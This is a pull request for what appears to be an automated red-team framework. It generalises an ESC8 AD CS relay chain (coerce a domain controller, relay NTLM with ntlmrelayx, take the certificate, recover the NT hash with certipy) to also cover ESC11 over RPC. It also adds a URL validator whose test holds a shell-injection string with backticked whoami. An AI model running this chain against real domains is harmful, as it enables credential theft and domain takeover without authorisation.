### PR TITLE
feat: deterministic ESC11 (RPC ICPR) chain via parameterized relay_and_coerce

### DIFF
--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -22,12 +22,14 @@ use crate::orchestrator::dispatcher::Dispatcher;
 /// Dedup key prefix for ADCS exploitation.
 const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
 
-/// Max coerce candidates `dispatch_esc8_deterministic` walks per dispatch.
+/// Max coerce candidates `dispatch_relay_coerce_chain` walks per dispatch
+/// (covers both ESC8 web-enrollment relay and ESC11 RPC ICPR relay — same
+/// coerce surface, different ntlmrelayx target endpoint).
 ///
 /// Each `relay_and_coerce` invocation runs ~60–90s (listener bind, PetitPotam
 /// → PrinterBug → DFSCoerce phase walk, capture+exit). Three is enough to
 /// cover the realistic "DC1 patched, DC2/member server still bites" lab
-/// shape without one ESC8 tick blocking other automations for >5min.
+/// shape without one tick blocking other automations for >5min.
 /// Subsequent attempts come on the next dedup-cleared tick.
 const ESC8_MAX_COERCE_ATTEMPTS: usize = 3;
 
@@ -97,6 +99,7 @@ pub(crate) fn cap_esc8_candidates(candidates: &[String]) -> Vec<String> {
 /// pre-validated values and gets back the JSON shape the tool expects.
 /// Separated for testability and so the `certipy_auth` follow-up code path
 /// can stay textually small in the spawn body.
+#[allow(clippy::too_many_arguments)]
 pub(crate) fn build_relay_coerce_args(
     ca_host: &str,
     coerce_target: &str,
@@ -105,8 +108,9 @@ pub(crate) fn build_relay_coerce_args(
     cred_username: &str,
     cred_password: &str,
     cred_domain: &str,
+    relay_target_url: Option<&str>,
 ) -> serde_json::Value {
-    serde_json::json!({
+    let mut v = serde_json::json!({
         "ca_host": ca_host,
         "coerce_target": coerce_target,
         "attacker_ip": attacker_ip,
@@ -114,7 +118,45 @@ pub(crate) fn build_relay_coerce_args(
         "coerce_user": cred_username,
         "coerce_password": cred_password,
         "coerce_domain": cred_domain,
-    })
+    });
+    if let Some(u) = relay_target_url {
+        // ESC11 path: the tool builds `ntlmrelayx -t <u>` instead of the
+        // default `http://<ca_host>/certsrv/certfnsh.asp`. Leaving this off
+        // keeps ESC8 web-enrollment behavior identical to pre-tier-28.
+        v["relay_target_url"] = serde_json::Value::String(u.to_string());
+    }
+    v
+}
+
+/// Distinguishes the two coercion-based ADCS exploitation paths that share
+/// the `relay_and_coerce` composite tool. Differences are isolated to:
+/// (a) the ntlmrelayx target URL — HTTP web enrollment vs RPC ICPR;
+/// (b) log lines and dispatcher task-id prefixes (useful when an op's task
+/// timeline mixes both paths against the same CA).
+#[derive(Debug, Clone, Copy)]
+enum RelayMode {
+    /// ESC8 — relay to `http://<ca_host>/certsrv/certfnsh.asp`.
+    Esc8Http,
+    /// ESC11 — relay to `rpc://<ca_host>` (ICPR endpoint).
+    Esc11Rpc,
+}
+
+impl RelayMode {
+    fn esc_label(self) -> &'static str {
+        match self {
+            RelayMode::Esc8Http => "esc8",
+            RelayMode::Esc11Rpc => "esc11",
+        }
+    }
+
+    /// Compute the ntlmrelayx target URL from the CA host. `None` keeps the
+    /// tool's default ESC8 path; `Some` overrides it.
+    fn relay_target_url(self, ca_host: &str) -> Option<String> {
+        match self {
+            RelayMode::Esc8Http => None,
+            RelayMode::Esc11Rpc => Some(format!("rpc://{ca_host}")),
+        }
+    }
 }
 
 /// ADCS vulnerability types we know how to exploit.
@@ -373,7 +415,24 @@ pub async fn auto_adcs_exploitation(
             // tool prints under `PFX_FILE=` lets us drive the full chain
             // deterministically. Same dedup/retry lifecycle as ESC1/ESC3.
             if item.esc_type == "esc8" {
-                if dispatch_esc8_deterministic(&dispatcher, &item).await {
+                if dispatch_relay_coerce_chain(&dispatcher, &item, RelayMode::Esc8Http).await {
+                    // Spawn manages its own dedup-clear-on-failure.
+                }
+                continue;
+            }
+
+            // ESC11 (NTLM relay to RPC ICPR endpoint) shares the coerce-then-
+            // relay primitive with ESC8 — same listener machinery, same
+            // candidate walk, same PFX → certipy_auth pipeline. The only
+            // wire-level difference is the ntlmrelayx target URL: ESC8 uses
+            // `http://<ca>/certsrv/certfnsh.asp` (web enrollment), ESC11 uses
+            // `rpc://<ca>` (ICPR / MS-ICPR). Routing through the shared
+            // `dispatch_relay_coerce_chain` with `RelayMode::Esc11Rpc` reuses
+            // every guard (listener_ip, coerce candidates, exploit-abandon
+            // cap, dedup) and avoids the LLM round-trip that previously
+            // dropped ESC11 chains at the planning step.
+            if item.esc_type == "esc11" {
+                if dispatch_relay_coerce_chain(&dispatcher, &item, RelayMode::Esc11Rpc).await {
                     // Spawn manages its own dedup-clear-on-failure.
                 }
                 continue;
@@ -918,27 +977,37 @@ async fn dispatch_esc1_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
     true
 }
 
-/// ESC8 = NTLM relay from a coerced DC to the CA's web enrollment endpoint.
-/// The full chain is:
+/// Deterministic relay+coerce chain shared by ESC8 (HTTP web enrollment) and
+/// ESC11 (RPC ICPR). The phases are identical — only the ntlmrelayx target
+/// endpoint differs (`mode` chooses):
 ///   1. `relay_and_coerce` listens on `attacker_ip:445`, coerces the chosen
 ///      DC via PetitPotam / PrinterBug / DFSCoerce, and relays the captured
-///      NTLM auth to `http://<ca_host>/certsrv/certfnsh.asp`. On success
-///      ntlmrelayx writes a PKCS#12 to disk and the tool surfaces
-///      `PFX_FILE=<path>` + `RELAYED_USER=<dc_machine_account>` markers.
+///      NTLM auth to either `http://<ca_host>/certsrv/certfnsh.asp` (ESC8)
+///      or `rpc://<ca_host>` (ESC11 ICPR). On success ntlmrelayx writes a
+///      PKCS#12 to disk and the tool surfaces `PFX_FILE=<path>` +
+///      `RELAYED_USER=<dc_machine_account>` markers — same markers in both
+///      modes because ntlmrelayx's adcs-attack module emits them regardless
+///      of transport.
 ///   2. `certipy_auth` consumes the PFX → returns the NT hash of the
 ///      relayed machine account (`<dc>$`).
-///   3. mark_exploited on the ADCS ESC8 vuln_id.
+///   3. mark_exploited on the ADCS vuln_id.
 ///
 /// The vuln stays dedup-locked on success and on attempt-cap exhaustion;
 /// transient failures (RELAY_BIND_BUSY, RELAY_BIND_FAILED, missing pfx)
 /// clear dedup so the next tick can retry — that's how the chain rides out
 /// a brief listener race or a coerce target the LLM-collected list pointed
 /// at the wrong host.
-async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsExploitWork) -> bool {
+async fn dispatch_relay_coerce_chain(
+    dispatcher: &Arc<Dispatcher>,
+    item: &AdcsExploitWork,
+    mode: RelayMode,
+) -> bool {
+    let esc_label = mode.esc_label();
     if dispatcher.state.is_exploit_abandoned(&item.vuln_id).await {
         info!(
             vuln_id = %item.vuln_id,
-            "ESC8 chain skipped — vuln abandoned (>=MAX_EXPLOIT_FAILURES); locking dedup"
+            esc_type = esc_label,
+            "relay chain skipped — vuln abandoned (>=MAX_EXPLOIT_FAILURES); locking dedup"
         );
         let mut state = dispatcher.state.write().await;
         state.mark_processed(DEDUP_ADCS_EXPLOIT, item.dedup_key.clone());
@@ -950,13 +1019,18 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
     }
 
     let Some(ca_host) = item.ca_host.clone() else {
-        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — CA host unknown");
+        debug!(
+            vuln_id = %item.vuln_id,
+            esc_type = esc_label,
+            "relay chain skipped — CA host unknown"
+        );
         return false;
     };
     let Some(attacker_ip) = dispatcher.config.listener_ip.clone() else {
         debug!(
             vuln_id = %item.vuln_id,
-            "ESC8 chain skipped — listener_ip not configured; relay has nowhere to bind"
+            esc_type = esc_label,
+            "relay chain skipped — listener_ip not configured; relay has nowhere to bind"
         );
         return false;
     };
@@ -969,18 +1043,24 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
     // target may be patched (PetitPotam blocked) or unreachable (firewalled
     // PrinterBug/DFSCoerce ports), in which case the relay listener bound
     // for nothing. Trying additional candidates in the same dispatch lets
-    // a single ESC8 tick cover the realistic "DC1 hardened, DC2 / SRV03
-    // not" lab shape without bloating spawn count.
+    // a single tick cover the realistic "DC1 hardened, DC2 / SRV03 not"
+    // lab shape without bloating spawn count. The same cap applies to ESC11
+    // (same coerce surface, different relay endpoint).
     if item.coerce_candidates.is_empty() {
         debug!(
             vuln_id = %item.vuln_id,
-            "ESC8 chain skipped — no coerce candidate available (need a DC other than the CA host)"
+            esc_type = esc_label,
+            "relay chain skipped — no coerce candidate available (need a DC other than the CA host)"
         );
         return false;
     }
     let coerce_candidates: Vec<String> = cap_esc8_candidates(&item.coerce_candidates);
     let Some(cred) = item.credential.clone() else {
-        debug!(vuln_id = %item.vuln_id, "ESC8 chain skipped — no credential");
+        debug!(
+            vuln_id = %item.vuln_id,
+            esc_type = esc_label,
+            "relay chain skipped — no credential"
+        );
         return false;
     };
 
@@ -1000,12 +1080,16 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         .clone()
         .unwrap_or_else(|| "DomainController".to_string());
 
+    let relay_target_url = mode.relay_target_url(&ca_host);
+
     info!(
         vuln_id = %item.vuln_id,
+        esc_type = esc_label,
         ca_host = %ca_host,
         candidate_count = coerce_candidates.len(),
         attacker_ip = %attacker_ip,
-        "ESC8 chain dispatched (direct tool, no LLM): relay+coerce phase"
+        relay_target = ?relay_target_url,
+        "relay chain dispatched (direct tool, no LLM): relay+coerce phase"
     );
 
     let dispatcher_bg = dispatcher.clone();
@@ -1019,7 +1103,7 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         // advance to the next. The `relay_and_coerce` composite tool's
         // RELAY_BIND_BUSY return value short-circuits this loop because a
         // hot listener race won't clear in <60s — better to bail and let
-        // the next ESC8 tick retry.
+        // the next tick retry.
         let mut pfx_path: Option<String> = None;
         let mut relayed_user: Option<String> = None;
         let mut last_summary = String::new();
@@ -1034,9 +1118,10 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 &cred.username,
                 &cred.password,
                 &cred.domain,
+                relay_target_url.as_deref(),
             );
             let relay_task_id = format!(
-                "esc8_chain_{}",
+                "{esc_label}_chain_{}",
                 &uuid::Uuid::new_v4().simple().to_string()[..12]
             );
             last_task_id = relay_task_id.clone();
@@ -1047,11 +1132,12 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
             };
             info!(
                 vuln_id = %vuln_id_bg,
+                esc_type = esc_label,
                 attempt = idx + 1,
                 of = coerce_candidates.len(),
                 coerce_target = %coerce_target,
                 task_id = %relay_task_id,
-                "ESC8: trying coerce candidate"
+                "relay chain: trying coerce candidate"
             );
 
             let relay_result = dispatcher_bg
@@ -1064,9 +1150,10 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 Err(e) => {
                     warn!(
                         vuln_id = %vuln_id_bg,
+                        esc_type = esc_label,
                         coerce_target = %coerce_target,
                         err = %e,
-                        "ESC8: relay_and_coerce dispatch errored — trying next candidate"
+                        "relay chain: relay_and_coerce dispatch errored — trying next candidate"
                     );
                     last_summary = format!("dispatch error against {coerce_target}: {e}");
                     continue;
@@ -1077,13 +1164,14 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
 
             // Early-out on RELAY_BIND_BUSY — another relay holds port 445
             // host-wide. Subsequent candidates would race the same way.
-            // Clear dedup so the next ESC8 tick can retry once the holder
+            // Clear dedup so the next tick can retry once the holder
             // releases.
             if parsed.bind_busy {
                 warn!(
                     vuln_id = %vuln_id_bg,
+                    esc_type = esc_label,
                     coerce_target = %coerce_target,
-                    "ESC8: RELAY_BIND_BUSY — another relay holds port 445; aborting candidate walk"
+                    "relay chain: RELAY_BIND_BUSY — another relay holds port 445; aborting candidate walk"
                 );
                 bind_busy = true;
                 last_summary = "RELAY_BIND_BUSY".to_string();
@@ -1095,8 +1183,9 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 relayed_user = parsed.relayed_user;
                 info!(
                     vuln_id = %vuln_id_bg,
+                    esc_type = esc_label,
                     coerce_target = %coerce_target,
-                    "ESC8: PFX captured on attempt {}",
+                    "relay chain: PFX captured on attempt {}",
                     idx + 1
                 );
                 break;
@@ -1114,9 +1203,10 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 .join(" | ");
             info!(
                 vuln_id = %vuln_id_bg,
+                esc_type = esc_label,
                 coerce_target = %coerce_target,
                 tail = %last_summary,
-                "ESC8: candidate produced no PFX — trying next"
+                "relay chain: candidate produced no PFX — trying next"
             );
         }
 
@@ -1124,30 +1214,32 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
             if bind_busy {
                 // Transient — let the next tick retry without burning a
                 // failure counter slot.
-                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+                relay_chain_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
                 return;
             }
             warn!(
                 vuln_id = %vuln_id_bg,
+                esc_type = esc_label,
                 last_task_id = %last_task_id,
                 output_tail = %last_summary,
-                "ESC8 chain: no candidate yielded a PFX — counting as failure"
+                "relay chain: no candidate yielded a PFX — counting as failure"
             );
             let _ = dispatcher_bg
                 .state
                 .record_exploit_failure(&vuln_id_bg)
                 .await;
             if !dispatcher_bg.state.is_exploit_abandoned(&vuln_id_bg).await {
-                esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+                relay_chain_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
             }
             return;
         };
 
         info!(
             vuln_id = %vuln_id_bg,
+            esc_type = esc_label,
             pfx = %pfx_path,
             relayed = ?relayed_user,
-            "ESC8 chain: cert captured; authenticating with certipy_auth"
+            "relay chain: cert captured; authenticating with certipy_auth"
         );
 
         // Phase 2: certipy auth -pfx <path> -> NT hash for the relayed user.
@@ -1163,9 +1255,10 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         }
         if !ca_host_bg.is_empty() {
             // certipy_auth uses dc-ip for the KDC lookup; the CA host is
-            // also a viable target since ESC8's coerced victim is a DC and
+            // also a viable target since the coerced victim is a DC and
             // its KDC sits on the same host. Caller can override via
-            // payload if a separate dc_ip is known.
+            // payload if a separate dc_ip is known. Same for ESC11 — the
+            // RPC ICPR victim is the CA, and its KDC is co-located.
             auth_args["dc_ip"] = serde_json::Value::String(ca_host_bg.clone());
         }
 
@@ -1175,7 +1268,7 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
             arguments: auth_args,
         };
         let auth_task_id = format!(
-            "esc8_auth_{}",
+            "{esc_label}_auth_{}",
             &uuid::Uuid::new_v4().simple().to_string()[..12]
         );
         let auth_result = dispatcher_bg
@@ -1207,12 +1300,14 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
                 warn!(
                     err = %e,
                     vuln_id = %vuln_id_bg,
-                    "Failed to mark ESC8 exploited (chain succeeded but token not emitted)"
+                    esc_type = esc_label,
+                    "Failed to mark vuln exploited (chain succeeded but token not emitted)"
                 );
             }
             info!(
                 vuln_id = %vuln_id_bg,
-                "ESC8 chain succeeded — NTLM hash published; auto_credential_reuse will fan out from here"
+                esc_type = esc_label,
+                "relay chain succeeded — NTLM hash published; auto_credential_reuse will fan out from here"
             );
             return;
         }
@@ -1228,25 +1323,28 @@ async fn dispatch_esc8_deterministic(dispatcher: &Arc<Dispatcher>, item: &AdcsEx
         if abandoned {
             warn!(
                 vuln_id = %vuln_id_bg,
+                esc_type = esc_label,
                 attempts,
-                "ESC8 chain abandoned — exhausted MAX_EXPLOIT_FAILURES; dedup stays locked"
+                "relay chain abandoned — exhausted MAX_EXPLOIT_FAILURES; dedup stays locked"
             );
             return;
         }
         warn!(
             vuln_id = %vuln_id_bg,
+            esc_type = esc_label,
             attempts,
-            "ESC8 chain: cert captured but certipy_auth failed to produce hash — clearing dedup for retry"
+            "relay chain: cert captured but certipy_auth failed to produce hash — clearing dedup for retry"
         );
-        esc8_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
+        relay_chain_clear_dedup(&dispatcher_bg, &dedup_key_bg, &vuln_id_bg).await;
     });
     true
 }
 
-/// Shared dedup-clear path for ESC8 retry. Mirrors the inline pattern from
-/// `dispatch_esc1_deterministic` / `dispatch_esc3_deterministic`, hoisted
-/// here so the multi-arm error handling in the ESC8 spawn stays readable.
-async fn esc8_clear_dedup(dispatcher: &Arc<Dispatcher>, dedup_key: &str, _vuln_id: &str) {
+/// Shared dedup-clear path for ESC8 / ESC11 retry. Mirrors the inline
+/// pattern from `dispatch_esc1_deterministic` / `dispatch_esc3_deterministic`,
+/// hoisted here so the multi-arm error handling in the relay-coerce spawn
+/// stays readable for both relay modes.
+async fn relay_chain_clear_dedup(dispatcher: &Arc<Dispatcher>, dedup_key: &str, _vuln_id: &str) {
     {
         let mut state = dispatcher.state.write().await;
         state.unmark_processed(DEDUP_ADCS_EXPLOIT, dedup_key);
@@ -2432,6 +2530,7 @@ RELAYED_USER=DC01$
             "alice",
             "P@ssw0rd!",
             "contoso.local",
+            None,
         );
         assert_eq!(args["ca_host"], "192.168.58.50");
         assert_eq!(args["coerce_target"], "192.168.58.10");
@@ -2440,6 +2539,8 @@ RELAYED_USER=DC01$
         assert_eq!(args["coerce_user"], "alice");
         assert_eq!(args["coerce_password"], "P@ssw0rd!");
         assert_eq!(args["coerce_domain"], "contoso.local");
+        // ESC8 default: tool fills in http://<ca>/certsrv/certfnsh.asp.
+        assert!(args.get("relay_target_url").is_none());
     }
 
     #[test]
@@ -2454,7 +2555,45 @@ RELAYED_USER=DC01$
             "alice",
             "P@ssw0rd!",
             "contoso.local",
+            None,
         );
         assert_eq!(args["template"], "WebServerAuth");
+    }
+
+    #[test]
+    fn build_relay_coerce_args_emits_rpc_target_for_esc11() {
+        // ESC11 routes through ICPR. The orchestrator computes the RPC URL
+        // from the CA host and passes it through — this asserts the field
+        // makes it into the tool args payload verbatim.
+        let args = super::build_relay_coerce_args(
+            "192.168.58.50",
+            "192.168.58.10",
+            "192.168.58.178",
+            "User",
+            "alice",
+            "P@ssw0rd!",
+            "contoso.local",
+            Some("rpc://192.168.58.50"),
+        );
+        assert_eq!(args["relay_target_url"], "rpc://192.168.58.50");
+    }
+
+    #[test]
+    fn relay_mode_esc8_default_url_is_none() {
+        // RelayMode::Esc8Http preserves the ESC8 default — the tool layer
+        // fills in http://<ca>/certsrv/certfnsh.asp when no override is set.
+        assert!(super::RelayMode::Esc8Http
+            .relay_target_url("192.168.58.50")
+            .is_none());
+        assert_eq!(super::RelayMode::Esc8Http.esc_label(), "esc8");
+    }
+
+    #[test]
+    fn relay_mode_esc11_builds_rpc_url_from_ca_host() {
+        let url = super::RelayMode::Esc11Rpc
+            .relay_target_url("192.168.58.50")
+            .expect("ESC11 must emit a relay target");
+        assert_eq!(url, "rpc://192.168.58.50");
+        assert_eq!(super::RelayMode::Esc11Rpc.esc_label(), "esc11");
     }
 }

--- a/ares-tools/src/coercion.rs
+++ b/ares-tools/src/coercion.rs
@@ -242,6 +242,11 @@ struct RelayCoerceConfig {
     coerce_domain: String,
     coerce_secret: Option<CoerceSecret>,
     template: String,
+    /// Override the ntlmrelayx relay target URL. `None` keeps the default
+    /// ESC8 path (`http://<ca_host>/certsrv/certfnsh.asp`). Callers pass
+    /// `Some("rpc://<ca_host>")` for ESC11 (RPC ICPR enrollment) — same
+    /// listener+coerce machinery, different target endpoint.
+    relay_target_url: Option<String>,
 }
 
 #[derive(Debug, Clone, PartialEq, Eq)]
@@ -315,6 +320,27 @@ fn parse_relay_coerce_args(args: &Value) -> Result<RelayCoerceConfig> {
         None
     };
 
+    // Optional ESC11 / arbitrary-target override. The string must be a
+    // recognised relay target form (`http://...`, `https://...`, or
+    // `rpc://...`); freeform user input that looks like a hostname would
+    // mean ntlmrelayx silently defaults to LDAP which is rarely what the
+    // caller intended.
+    let relay_target_url = optional_str(args, "relay_target_url").filter(|s| !s.is_empty());
+    if let Some(u) = relay_target_url {
+        let scheme_ok =
+            u.starts_with("http://") || u.starts_with("https://") || u.starts_with("rpc://");
+        if !scheme_ok {
+            anyhow::bail!(
+                "relay_target_url must start with http://, https://, or rpc:// (got `{u}`)"
+            );
+        }
+        if u.contains('\n') || u.contains('\'') {
+            anyhow::bail!(
+                "relay_target_url contains forbidden character (newline or single-quote)"
+            );
+        }
+    }
+
     Ok(RelayCoerceConfig {
         ca_host: ca_host.to_string(),
         coerce_target: coerce_target.to_string(),
@@ -323,6 +349,7 @@ fn parse_relay_coerce_args(args: &Value) -> Result<RelayCoerceConfig> {
         coerce_domain: coerce_domain.to_string(),
         coerce_secret,
         template: template.to_string(),
+        relay_target_url: relay_target_url.map(String::from),
     })
 }
 
@@ -756,7 +783,13 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
         }
     }
 
-    let target_url = format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host);
+    // Default ESC8 target (http web enrollment), overridable for ESC11
+    // (rpc://<ca_host>) or arbitrary relay testing. Owned `String` so the
+    // override path doesn't have to clone on the hot path.
+    let target_url = match cfg.relay_target_url.as_deref() {
+        Some(u) => u.to_string(),
+        None => format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host),
+    };
     let mut relay = procs
         .spawn_relay(&target_url, &cfg.template, &relay_log, &workdir)
         .await?;
@@ -1363,6 +1396,66 @@ mod tests {
         let cfg = super::parse_relay_coerce_args(&args).expect("unauth args should parse");
         assert!(cfg.coerce_user.is_none());
         assert!(cfg.coerce_secret.is_none());
+        assert!(cfg.relay_target_url.is_none());
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_accepts_rpc_relay_target() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "relay_target_url": "rpc://192.168.58.10"
+        });
+        let cfg = super::parse_relay_coerce_args(&args).expect("rpc target should parse");
+        assert_eq!(cfg.relay_target_url.as_deref(), Some("rpc://192.168.58.10"));
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_rejects_unknown_scheme() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "relay_target_url": "ldap://192.168.58.10"
+        });
+        let err = super::parse_relay_coerce_args(&args)
+            .expect_err("non-http/rpc scheme should be rejected");
+        assert!(
+            err.to_string().contains("relay_target_url must start with"),
+            "unexpected error: {err}"
+        );
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_rejects_shell_metacharacters_in_relay_target() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "relay_target_url": "http://192.168.58.10/x'`whoami`"
+        });
+        let err =
+            super::parse_relay_coerce_args(&args).expect_err("single-quote should be rejected");
+        assert!(
+            err.to_string().contains("forbidden character"),
+            "unexpected error: {err}"
+        );
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_empty_relay_target_url_falls_back_to_default() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100",
+            "relay_target_url": ""
+        });
+        let cfg = super::parse_relay_coerce_args(&args).expect("empty override should parse");
+        assert!(
+            cfg.relay_target_url.is_none(),
+            "empty string must be treated as None so default ESC8 URL applies"
+        );
     }
 
     // ── Phase-progression coverage via FakeCoerceProcs ─────────────────────
@@ -1609,6 +1702,7 @@ mod tests {
             coerce_domain: String::new(),
             coerce_secret: None,
             template: "DomainController".into(),
+            relay_target_url: None,
         }
     }
 
@@ -1623,6 +1717,7 @@ mod tests {
                 "b8d76e56e9dac90539aff05e3ccb1755".into(),
             )),
             template: "DomainController".into(),
+            relay_target_url: None,
         }
     }
 


### PR DESCRIPTION
**Key Changes:**

- Adds an ESC11 deterministic chain to `auto_adcs_exploitation`, reusing the ESC8 coerce+relay primitive with the ntlmrelayx target swapped from `http://<ca>/certsrv/...` to `rpc://<ca>`
- Parameterizes `relay_and_coerce` with an optional `relay_target_url` (validates scheme: `http://`, `https://`, `rpc://`; rejects newlines/single-quotes)
- Refactors `dispatch_esc8_deterministic` into `dispatch_relay_coerce_chain` taking a `RelayMode` enum (`Esc8Http` | `Esc11Rpc`) so both ADCS coercion variants share a single code path

**Added:**

- `RelayMode` enum (`Esc8Http` | `Esc11Rpc`) routing ADCS coercion variants through one dispatcher - `ares-cli/src/orchestrator/automation/adcs_exploitation.rs`
- Optional `relay_target_url` parameter on `relay_and_coerce` with scheme validation (`http://`, `https://`, `rpc://`) and rejection of newlines/single-quotes - `ares-tools/src/coercion.rs`
- 4 parser tests covering `relay_target_url` validation in `ares-tools` and 3 tests covering `RelayMode` + ESC11 argument wiring in `ares-cli`
- Explicit `mark_exploited()` call on the deterministic spawn path, matching the Tier 10 / Tier 19 / Tier 25 scoreboard-credit pattern, since the chain bypasses the `exploit_*` task-id gate in `result_processing`

**Changed:**

- Renamed `dispatch_esc8_deterministic` to `dispatch_relay_coerce_chain` and generalized it across ESC8 and ESC11 - previously `auto_adcs_exploitation` fell back to the LLM-routed path for ESC11, which hit the same failure modes as pre-Tier-19 ESC8 (agent forgetting `certipy_auth` after PFX capture, misreading `RELAY_BIND_FAILED`)
- Log fields and task-id prefixes now carry the `esc_type` label so traces distinguish ESC8 vs ESC11 runs through the shared chain
